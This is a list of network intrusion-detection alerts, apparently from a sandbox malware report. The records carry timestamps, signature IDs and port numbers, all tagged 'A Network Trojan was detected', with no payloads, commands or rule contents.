                  Timestamp:05/23/24-20:18:19.988815
                  SID:2021641
                  Source Port:49203
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:17:54.073092
                  SID:2025381
                  Source Port:49181
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:19:16.005968
                  SID:2025381
                  Source Port:49259
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:18:31.712532
                  SID:2024318
                  Source Port:49216
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:18:31.712532
                  SID:2024313
                  Source Port:49216
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:18:10.679781
                  SID:2025381
                  Source Port:49197
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:19:01.377448
                  SID:2024318
                  Source Port:49243
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:18:08.948107
                  SID:2024318
                  Source Port:49195
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:19:01.377448
                  SID:2024313
                  Source Port:49243
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:18:26.597772
                  SID:2021641
                  Source Port:49210
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:19:03.316993
                  SID:2021641
                  Source Port:49245
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:17:52.694696
                  SID:2024318
                  Source Port:49180
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:18:08.948107
                  SID:2024313
                  Source Port:49195
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:18:21.836224
                  SID:2024313
                  Source Port:49205
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:18:25.484710
                  SID:2825766
                  Source Port:49209
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:19:07.020535
                  SID:2025381
                  Source Port:49249
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:19:09.943896
                  SID:2025381
                  Source Port:49252
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:19:18.441021
                  SID:2825766
                  Source Port:49262
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:18:07.107766
                  SID:2025381
                  Source Port:49193
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:18:56.909324
                  SID:2021641
                  Source Port:49238
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:18:49.167216
                  SID:2021641
                  Source Port:49230
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:18:48.359257
                  SID:2021641
                  Source Port:49229
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:18:53.400223
                  SID:2825766
                  Source Port:49234
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:17:56.049434
                  SID:2025381
                  Source Port:49182
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:18:00.736741
                  SID:2025381
                  Source Port:49187
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:18:59.521470
                  SID:2021641
                  Source Port:49241
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:19:03.316993
                  SID:2825766
                  Source Port:49245
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:18:03.278750
                  SID:2025381
                  Source Port:49190
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:17:43.183162
                  SID:2025381
                  Source Port:49170
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:17:36.624490
                  SID:2024312
                  Source Port:49165
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:18:17.156368
                  SID:2024318
                  Source Port:49200
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:18:17.156368
                  SID:2024313
                  Source Port:49200
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:18:56.093323
                  SID:2825766
                  Source Port:49237
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:18:18.976087
                  SID:2024318
                  Source Port:49202
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:17:42.120355
                  SID:2825766
                  Source Port:49169
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:18:18.976087
                  SID:2024313
                  Source Port:49202
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:19:15.184596
                  SID:2024313
                  Source Port:49258
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:18:11.714251
                  SID:2021641
                  Source Port:49198
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:19:15.184596
                  SID:2024318
                  Source Port:49258
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:18:22.772748
                  SID:2825766
                  Source Port:49206
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:18:21.836224
                  SID:2024318
                  Source Port:49205
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:17:36.624490
                  SID:2024317
                  Source Port:49165
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:17:44.106859
                  SID:2021641
                  Source Port:49171
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:18:39.381191
                  SID:2025381
                  Source Port:49219
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:18:04.176231
                  SID:2024318
                  Source Port:49191
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:18:09.860809
                  SID:2021641
                  Source Port:49196
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:18:01.557933
                  SID:2024318
                  Source Port:49188
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:18:52.425128
                  SID:2021641
                  Source Port:49233
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:18:24.566045
                  SID:2025381
                  Source Port:49208
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:18:01.557933
                  SID:2024313
                  Source Port:49188
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:19:16.882044
                  SID:2025381
                  Source Port:49260
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:17:57.920775
                  SID:2825766
                  Source Port:49184
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:17:46.332436
                  SID:2021641
                  Source Port:49173
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:19:05.135747
                  SID:2825766
                  Source Port:49247
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:18:04.176231
                  SID:2024313
                  Source Port:49191
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:18:45.625277
                  SID:2825766
                  Source Port:49226
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:18:02.368807
                  SID:2825766
                  Source Port:49189
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:18:38.560340
                  SID:2024318
                  Source Port:49218
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:17:40.814233
                  SID:2021641
                  Source Port:49168
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:18:26.597772
                  SID:2024318
                  Source Port:49210
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:18:38.560340
                  SID:2024313
                  Source Port:49218
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:17:51.806006
                  SID:2025381
                  Source Port:49179
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:17:50.944456
                  SID:2021641
                  Source Port:49178
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:18:10.679781
                  SID:2825766
                  Source Port:49197
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:19:14.278026
                  SID:2025381
                  Source Port:49257
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:18:23.674890
                  SID:2021641
                  Source Port:49207
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:18:26.597772
                  SID:2024313
                  Source Port:49210
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:19:01.377448
                  SID:2021641
                  Source Port:49243
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:19:17.653379
                  SID:2024318
                  Source Port:49261
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:19:17.653379
                  SID:2024313
                  Source Port:49261
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:17:39.511374
                  SID:2024313
                  Source Port:49167
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:17:49.147570
                  SID:2825766
                  Source Port:49176
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:19:02.183841
                  SID:2021641
                  Source Port:49244
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:19:13.398917
                  SID:2024318
                  Source Port:49256
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:19:16.005968
                  SID:2021641
                  Source Port:49259
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:19:10.741295
                  SID:2021641
                  Source Port:49253
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:18:40.275029
                  SID:2025381
                  Source Port:49220
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:19:08.863871
                  SID:2021641
                  Source Port:49251
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:18:57.792134
                  SID:2025381
                  Source Port:49239
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:18:37.677256
                  SID:2024313
                  Source Port:49217
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:19:13.398917
                  SID:2024313
                  Source Port:49256
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:17:35.132025
                  SID:2021641
                  Source Port:49164
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:17:39.511374
                  SID:2024318
                  Source Port:49167
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:18:30.098368
                  SID:2024318
                  Source Port:49214
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:18:43.784658
                  SID:2825766
                  Source Port:49224
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:19:00.429820
                  SID:2021641
                  Source Port:49242
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:18:42.915752
                  SID:2024318
                  Source Port:49223
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:18:30.098368
                  SID:2024313
                  Source Port:49214
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:18:42.915752
                  SID:2024313
                  Source Port:49223
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:18:19.988815
                  SID:2025381
                  Source Port:49203
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:18:44.730541
                  SID:2825766
                  Source Port:49225
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:17:54.073092
                  SID:2021641
                  Source Port:49181
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:18:16.270962
                  SID:2025381
                  Source Port:49199
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:17:52.694696
                  SID:2025381
                  Source Port:49180
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:18:56.093323
                  SID:2024313
                  Source Port:49237
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:17:56.984952
                  SID:2021641
                  Source Port:49183
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:17:42.120355
                  SID:2021641
                  Source Port:49169
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:18:56.093323
                  SID:2024318
                  Source Port:49237
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:19:02.183841
                  SID:2825766
                  Source Port:49244
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:18:09.860809
                  SID:2825766
                  Source Port:49196
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:18:44.730541
                  SID:2021641
                  Source Port:49225
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:18:37.677256
                  SID:2024318
                  Source Port:49217
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:18:50.061779
                  SID:2025381
                  Source Port:49231
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:18:07.989686
                  SID:2021641
                  Source Port:49194
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:18:28.376454
                  SID:2021641
                  Source Port:49212
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:18:43.784658
                  SID:2024313
                  Source Port:49224
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:18:49.167216
                  SID:2825766
                  Source Port:49230
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:19:00.429820
                  SID:2825766
                  Source Port:49242
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:18:10.679781
                  SID:2024318
                  Source Port:49197
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:18:08.948107
                  SID:2025381
                  Source Port:49195
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:18:29.294238
                  SID:2024318
                  Source Port:49213
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:18:29.294238
                  SID:2024313
                  Source Port:49213
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:18:41.210686
                  SID:2021641
                  Source Port:49221
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:18:10.679781
                  SID:2024313
                  Source Port:49197
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:18:43.784658
                  SID:2024318
                  Source Port:49224
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:17:38.077506
                  SID:2024318
                  Source Port:49166
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:17:39.511374
                  SID:2825766
                  Source Port:49167
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:17:56.984952
                  SID:2825766
                  Source Port:49183
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:17:58.820260
                  SID:2021641
                  Source Port:49185
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:19:17.653379
                  SID:2825766
                  Source Port:49261
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:17:45.155201
                  SID:2825766
                  Source Port:49172
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:17:38.077506
                  SID:2024313
                  Source Port:49166
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:18:21.836224
                  SID:2825766
                  Source Port:49205
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:17:57.920775
                  SID:2024313
                  Source Port:49184
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:19:12.597934
                  SID:2825766
                  Source Port:49255
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:18:27.512891
                  SID:2024313
                  Source Port:49211
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:17:45.155201
                  SID:2021641
                  Source Port:49172
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:17:57.920775
                  SID:2024318
                  Source Port:49184
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:18:58.594043
                  SID:2021641
                  Source Port:49240
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:18:06.045591
                  SID:2021641
                  Source Port:49192
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:18:27.512891
                  SID:2024318
                  Source Port:49211
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:18:54.312724
                  SID:2025381
                  Source Port:49235
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:18:45.625277
                  SID:2024313
                  Source Port:49226
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:18:47.441038
                  SID:2025381
                  Source Port:49228
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:19:11.675767
                  SID:2025381
                  Source Port:49254
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:18:25.484710
                  SID:2021641
                  Source Port:49209
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:19:12.597934
                  SID:2021641
                  Source Port:49255
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:19:10.741295
                  SID:2825766
                  Source Port:49253
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:18:46.517579
                  SID:2024318
                  Source Port:49227
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:18:45.625277
                  SID:2024318
                  Source Port:49226
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:17:58.820260
                  SID:2825766
                  Source Port:49185
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:19:05.135747
                  SID:2024313
                  Source Port:49247
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:18:46.517579
                  SID:2024313
                  Source Port:49227
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:18:04.176231
                  SID:2825766
                  Source Port:49191
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:19:05.135747
                  SID:2024318
                  Source Port:49247
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:19:10.741295
                  SID:2024318
                  Source Port:49253
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:19:02.183841
                  SID:2024313
                  Source Port:49244
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:17:39.511374
                  SID:2021641
                  Source Port:49167
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:18:24.566045
                  SID:2021641
                  Source Port:49208
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:19:02.183841
                  SID:2024318
                  Source Port:49244
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:19:01.377448
                  SID:2025381
                  Source Port:49243
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:19:14.278026
                  SID:2024313
                  Source Port:49257
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:19:10.741295
                  SID:2024313
                  Source Port:49253
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:19:17.653379
                  SID:2025381
                  Source Port:49261
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:18:23.674890
                  SID:2825766
                  Source Port:49207
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:18:39.381191
                  SID:2021641
                  Source Port:49219
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:19:14.278026
                  SID:2024318
                  Source Port:49257
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:17:50.944456
                  SID:2025381
                  Source Port:49178
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:19:00.429820
                  SID:2024313
                  Source Port:49242
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:18:17.156368
                  SID:2025381
                  Source Port:49200
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:18:41.981231
                  SID:2825766
                  Source Port:49222
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:18:54.312724
                  SID:2024313
                  Source Port:49235
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:18:18.976087
                  SID:2025381
                  Source Port:49202
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:18:46.517579
                  SID:2825766
                  Source Port:49227
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:19:01.377448
                  SID:2825766
                  Source Port:49243
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:18:27.512891
                  SID:2025381
                  Source Port:49211
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:18:54.312724
                  SID:2024318
                  Source Port:49235
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:19:00.429820
                  SID:2024318
                  Source Port:49242
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:17:38.077506
                  SID:2025381
                  Source Port:49166
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:19:11.675767
                  SID:2024318
                  Source Port:49254
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:18:58.594043
                  SID:2025381
                  Source Port:49240
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:19:15.184596
                  SID:2825766
                  Source Port:49258
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:18:22.772748
                  SID:2024318
                  Source Port:49206
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:18:11.714251
                  SID:2825766
                  Source Port:49198
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:17:42.120355
                  SID:2024318
                  Source Port:49169
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:18:37.677256
                  SID:2825766
                  Source Port:49217
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:17:42.120355
                  SID:2024313
                  Source Port:49169
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:18:41.210686
                  SID:2025381
                  Source Port:49221
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:18:41.981231
                  SID:2025381
                  Source Port:49222
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:18:44.730541
                  SID:2024313
                  Source Port:49225
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:18:01.557933
                  SID:2025381
                  Source Port:49188
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:19:09.943896
                  SID:2024318
                  Source Port:49252
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:18:44.730541
                  SID:2024318
                  Source Port:49225
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:18:55.233506
                  SID:2024318
                  Source Port:49236
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/23/24-20:19:11.675767
                  SID:2024313
                  Source Port:49254
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
